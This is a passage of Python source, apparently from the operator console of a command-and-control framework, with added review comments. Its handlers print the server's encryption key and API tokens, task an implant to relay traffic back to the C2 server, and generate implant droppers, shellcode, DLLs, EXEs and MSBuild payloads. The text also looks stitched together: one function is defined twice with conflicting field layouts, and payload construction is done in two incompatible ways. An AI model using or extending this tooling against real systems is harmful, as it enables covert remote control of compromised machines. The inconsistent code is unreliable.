    summary = get_opsec_string(user, command)
    print_good(summary)
    do_get_opsec_events(user, command)
def do_history(user, command):
    """Print the console command history returned by ``get_history()``.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).
    """
    history_text = get_history()
    print_good(history_text)
    input("Press Enter to continue...")
    clear()
def do_show_serverinfo(user, command):
    """Dump the C2Server configuration row (read positionally, i[1]..i[22]).

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).

    NOTE(review): this prints secrets in clear — ``EncKey``, the default
    proxy password and the Pushover API token — so be mindful of shared or
    logged consoles.
    """
    i = get_c2server_all()
    labels = [
        "PayloadCommsHost", "EncKey", "DomainFrontHeader", "DefaultSleep",
        "KillDate", "GET_404_Response", "PoshProjectDirectory",
        "PayloadCommsPort", "QuickCommand", "DownloadURI", "DefaultProxyURL",
        "DefaultProxyUser", "DefaultProxyPass", "EnableSounds", "URLS",
        "SocksURLS", "Insecure", "UserAgent", "Referer", "Pushover_APIToken",
        "Pushover_APIUser", "EnableNotifications",
    ]
    values = [i[k] for k in range(1, 23)]
    # Leading newline, then one "Label: value" line per field (each "\n"-terminated).
    detailsformatted = "\n" + "".join("%s: %s\n" % pair for pair in zip(labels, values))
    print_good(detailsformatted)
    input("Press Enter to continue...")
    clear()
def do_help(user, command):
    """Print the module-level ``pre_help`` text, then pause and clear.

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).
    """
    help_text = pre_help
    print_good(help_text)
    input("Press Enter to continue...")
    clear()
def do_show_serverinfo(user, command):
    """Dump the C2Server configuration row (read positionally, i[1]..i[24]).

    Args:
        user: console user (unused; common handler signature).
        command: raw command line (unused).

    NOTE(review): this prints secrets in clear — ``EncKey``, the default
    proxy password, ``APIKEY`` and ``APIToken`` — so be mindful of shared or
    logged consoles.
    """
    i = get_c2server_all()
    labels = [
        "HostnameIP", "EncKey", "DomainFrontHeader", "DefaultSleep",
        "KillDate", "HTTPResponse", "FolderPath", "ServerPort",
        "QuickCommand", "DownloadURI", "DefaultProxyURL", "DefaultProxyUser",
        "DefaultProxyPass", "EnableSounds", "APIKEY", "MobileNumber", "URLS",
        "SocksURLS", "Insecure", "UserAgent", "Referer", "APIToken",
        "APIUser", "EnableNotifications",
    ]
    values = [i[k] for k in range(1, 25)]
    # Leading newline, then one "Label: value" line per field (each "\n"-terminated).
    detailsformatted = "\n" + "".join("%s: %s\n" % pair for pair in zip(labels, values))
    print_good(detailsformatted)
    input("Press Enter to continue...")
    clear()
def do_startdaisy(user, command, randomuri):
    """Interactively task an implant to start a daisy-chain relay (daisy.dll
    variant), optionally generating payloads that call back through it.

    Args:
        user: console user, recorded as the task owner.
        command: raw command line (unused; the task text is rebuilt here).
        randomuri: RandomURI of the implant that will host the daisy.

    Prompts for elevation, bind IP/port, whether this is the first daisy in
    the chain (then C2 URL, domain front and proxy details; otherwise an
    upstream daisy host/port) and queues an ``invoke-daisychain`` task whose
    arguments are positional, double-quoted fields.

    NOTE(review): the quoted fields are not escaped, so a value containing
    ``"`` would break the task line; the proxy password is embedded in clear.
    Only an explicit ``n`` counts as unelevated — any other answer is treated
    as elevated. C2 settings and implant rows are read positionally.
    """
    check_module_loaded("daisy.dll", randomuri, user)

    elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)

    domain_front = ""
    proxy_user = ""
    proxy_pass = ""
    proxy_url = ""

    if elevated.lower() == "n":
        cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
        # Blank answer defaults to "no" and aborts.
        if cont.lower() == "n" or cont == "":
            return

        bind_ip = "localhost"

    else:
        bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)

    bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
    firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
    if firstdaisy.lower() == "y" or firstdaisy == "":
        upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {PayloadCommsHost}): " + Colours.END)
        if DomainFrontHeader:
            domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {DomainFrontHeader}): " + Colours.END)
        else:
            domain_front = input(Colours.GREEN + f"Domain front header (leave blank for configured value of no header): " + Colours.END)
        proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
        proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
        proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)

        # Blank answers fall back to the module-level configuration values.
        if not upstream_url:
            upstream_url = PayloadCommsHost
        if not domain_front:
            domain_front = DomainFrontHeader

    else:
        # Chained daisy: the upstream is another daisy, reached over plain HTTP,
        # and its host doubles as the front header.
        upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server:  " + Colours.END)
        upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port:  " + Colours.END)
        upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
        domain_front = upstream_daisy_host

    # URL list is passed unquoted with spaces removed; the other fields are quoted.
    urls = get_allurls().replace(" ", "")
    useragent = UserAgent
    command = f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" \"{upstream_url}\" \"{domain_front}\" \"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}"

    new_task(command, user, randomuri)
    update_label("DaisyHost", randomuri)

    createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ")

    if createpayloads.lower() == "y" or createpayloads == "":

        name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)

        daisyhost = get_implantdetails(randomuri)
        # Disable any proxy in the PowerShell dropper unless $proxyurl is set.
        proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
        C2 = get_c2server_all()
        # Positional Payloads() call: the comms host is the daisy bind IP and
        # the port field carries bind_port; C2[n] columns are read by index.
        newPayload = Payloads(C2[5], C2[2], f"http://{bind_ip}", "", f"{bind_port}", "", "", "",
                                "", proxynone, C2[17], C2[18], C2[19], "%s?d" % get_newimplanturl(), PayloadsDirectory)
        # Tag the dropper with the daisy host's user@domain (daisyhost[11], [3])
        # in place of the upstream URL marker.
        newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost[11], daisyhost[3]))
        newPayload.CreateRaw(name)
        newPayload.CreateDlls(name)
        newPayload.CreateShellcode(name)
        newPayload.CreateEXE(name)
        newPayload.CreateMsbuild(name)
        newPayload.CreateCS(name)
        # NOTE(review): argument positions differ from the other new_urldetails
        # calls in this file (proxyurl/proxyuser/proxypass slots receive a
        # "Daisy: <name>" label, the upstream URL and daisyhost[0]); confirm
        # against the new_urldetails signature before relying on those columns.
        new_urldetails(name, C2[1], C2[3], f"Daisy: {name}", upstream_url, daisyhost[0], "")
        print_good("Created new %s daisy payloads" % name)
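def do_createnewpayload(user, command, creds=None, shellcodeOnly=False):
    """Interactively create a payload set for one or more comms URLs / fronts.

    Args:
        user: console user; passed to ``get_creds_from_params`` for
            ``-credid`` lookups.
        command: raw command line; ``-credid <id>`` selects stored proxy
            credentials, otherwise proxy user/password are prompted when a
            proxy URL is given.
        creds: accepted for signature compatibility but reset to ``None`` on
            entry (as in the original); only ``-credid`` populates it.
        shellcodeOnly: when true only the droppers and shellcode are written;
            otherwise raw, DLL, EXE, MSBuild, Python and donut variants too.

    Fixes relative to the original handler:
      * a mismatch between the number of comms URLs and domain-front hosts
        printed an error but then carried on and generated payloads anyway;
        it now aborts after the pause;
      * the proxy user built from stored credentials used a format string
        with no conversion specifiers (``"******" % (domain, user)``), which
        raises ``TypeError`` whenever ``-credid`` is used; it is now rendered
        as ``domain\\user``, the form the interactive prompt asks for;
      * a blank PBind secret or pipe name falls back to the configured
        ``PBindSecret``/``PBindPipeName`` rather than baking an empty value
        into the payload (the prompts show those defaults as examples).

    NOTE(review): the proxy password is read with ``input()`` (echoed) and
    persisted in clear by ``new_urldetails``.
    """
    params = re.compile("createnewpayload ", re.IGNORECASE)
    params = params.sub("", command)
    creds = None
    if "-credid" in params:
        creds, params = get_creds_from_params(params, user)
        if creds is None:
            return
        if not creds['Password']:
            print_bad("This command does not support credentials with hashes")
            input("Press Enter to continue...")
            clear()
            return
    name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
    comms_url = input(
        "Domain or URL in array format: https://www.example.com,https://www.example2.com "
    )
    domainfront = input(
        "Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net "
    )
    proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
    pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ") or PBindSecret
    pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ") or PBindPipeName

    comms_url, PayloadCommsHostCount = string_to_array(comms_url)
    domainfront, DomainFrontHeaderCount = string_to_array(domainfront)
    # Each comms URL needs a matching front header entry; abort on mismatch.
    if PayloadCommsHostCount != DomainFrontHeaderCount:
        print("[-] Error - different number of host headers and URLs")
        input("Press Enter to continue...")
        clear()
        return

    proxyuser = ""
    proxypass = ""
    credsexpire = ""
    if proxyurl:
        if creds is not None:
            # domain\user, matching the "Proxy User: e.g. Domain\user" prompt.
            proxyuser = f"{creds['Domain']}\\{creds['Username']}"
            proxypass = creds['Password']
        else:
            proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
            proxypass = input("Proxy Password: e.g. Password1 ")
        credsexpire = input(
            Colours.GREEN +
            "Password/Account Expiration Date: .e.g. 15/03/2018 ")
        # "?p" marks a proxy-aware implant URL.
        imurl = "%s?p" % get_newimplanturl()
    else:
        imurl = get_newimplanturl()
    C2 = get_c2server_all()

    urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser,
                           proxypass, credsexpire)
    newPayload = Payloads(C2.KillDate,
                          C2.EncKey,
                          C2.Insecure,
                          C2.UserAgent,
                          C2.Referrer,
                          imurl,
                          PayloadsDirectory,
                          URLID=urlId,
                          PBindPipeName=pbindpipename,
                          PBindSecret=pbindsecret)

    prefix = "%s_" % name
    newPayload.CreateDroppers(prefix)
    newPayload.CreateShellcode(prefix)

    if not shellcodeOnly:
        newPayload.CreateRaw(prefix)
        newPayload.CreateDlls(prefix)
        newPayload.CreateEXE(prefix)
        newPayload.CreateMsbuild(prefix)
        newPayload.CreatePython(prefix)
        newPayload.CreateDonutShellcode(prefix)

    print_good("Created new payloads")
    input("Press Enter to continue...")
    clear()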